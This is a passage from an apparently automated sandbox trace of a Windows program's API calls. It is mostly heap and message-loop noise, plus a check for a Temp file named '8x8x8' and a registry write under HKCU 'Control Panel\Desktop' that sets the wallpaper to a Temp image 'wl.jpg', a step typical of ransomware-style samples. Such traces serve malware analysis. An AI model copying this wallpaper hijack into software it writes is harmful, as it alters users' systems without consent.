hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0294.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0294.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0294.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0294.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0294.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0294.719] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0294.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0294.719] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0294.719] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0294.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0294.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0294.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0294.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0294.720] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0294.720] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0294.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0294.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0294.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0294.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0294.720] timeGetTime () returned 0x1189be6 [0294.720] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.720] Sleep (dwMilliseconds=0xa) [0294.790] timeGetTime () returned 0x1189c2b [0294.790] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.790] Sleep (dwMilliseconds=0xa) [0294.860] timeGetTime () returned 0x1189c72 [0294.860] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.860] Sleep (dwMilliseconds=0xa) [0294.949] timeGetTime () returned 0x1189cca [0294.949] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0294.949] Sleep (dwMilliseconds=0xa) [0295.037] timeGetTime () returned 0x1189d23 [0295.038] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.038] Sleep (dwMilliseconds=0xa) [0295.112] timeGetTime () returned 0x1189d6d [0295.112] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.112] Sleep (dwMilliseconds=0xa) [0295.179] timeGetTime () returned 0x1189db0 [0295.179] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.179] Sleep (dwMilliseconds=0xa) [0295.245] timeGetTime () returned 0x1189df2 [0295.245] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.245] Sleep (dwMilliseconds=0xa) [0295.279] timeGetTime () returned 0x1189e15 [0295.279] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.279] Sleep (dwMilliseconds=0xa) [0295.315] timeGetTime () returned 0x1189e39 [0295.315] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.315] Sleep (dwMilliseconds=0xa) [0295.434] timeGetTime () returned 0x1189eaf [0295.434] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0295.434] TranslateMessage (lpMsg=0x8cf798) returned 0 [0295.434] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0295.434] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0295.434] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0295.434] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.434] Sleep (dwMilliseconds=0xa) [0295.470] timeGetTime () returned 0x1189ed3 [0295.470] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.470] Sleep (dwMilliseconds=0xa) [0295.505] timeGetTime () returned 0x1189ef6 [0295.505] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.505] Sleep (dwMilliseconds=0xa) [0295.542] timeGetTime () returned 0x1189f1b [0295.542] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.542] Sleep (dwMilliseconds=0xa) [0295.603] timeGetTime () returned 0x1189f59 [0295.603] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.603] Sleep (dwMilliseconds=0xa) [0295.641] timeGetTime () returned 0x1189f7e [0295.641] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.641] Sleep (dwMilliseconds=0xa) [0295.678] timeGetTime () returned 0x1189fa3 [0295.678] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.678] Sleep (dwMilliseconds=0xa) [0295.715] timeGetTime () returned 0x1189fc8 [0295.715] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0295.715] Sleep (dwMilliseconds=0xa) [0295.751] timeGetTime () returned 0x1189fec [0295.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0295.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0295.751] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0295.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0295.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0295.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0295.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0295.752] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0295.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0295.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0295.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0295.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0295.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0295.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0295.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0295.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0295.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0295.753] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0295.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0295.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0295.753] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0295.753] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0295.753] RegCloseKey (hKey=0x2d0) returned 0x0 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0295.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0295.754] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0295.754] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0295.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0295.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0295.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0295.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0295.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0295.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0295.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0295.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0295.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0295.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0295.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0295.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0295.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0295.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0295.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0295.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0295.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0295.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0295.757] 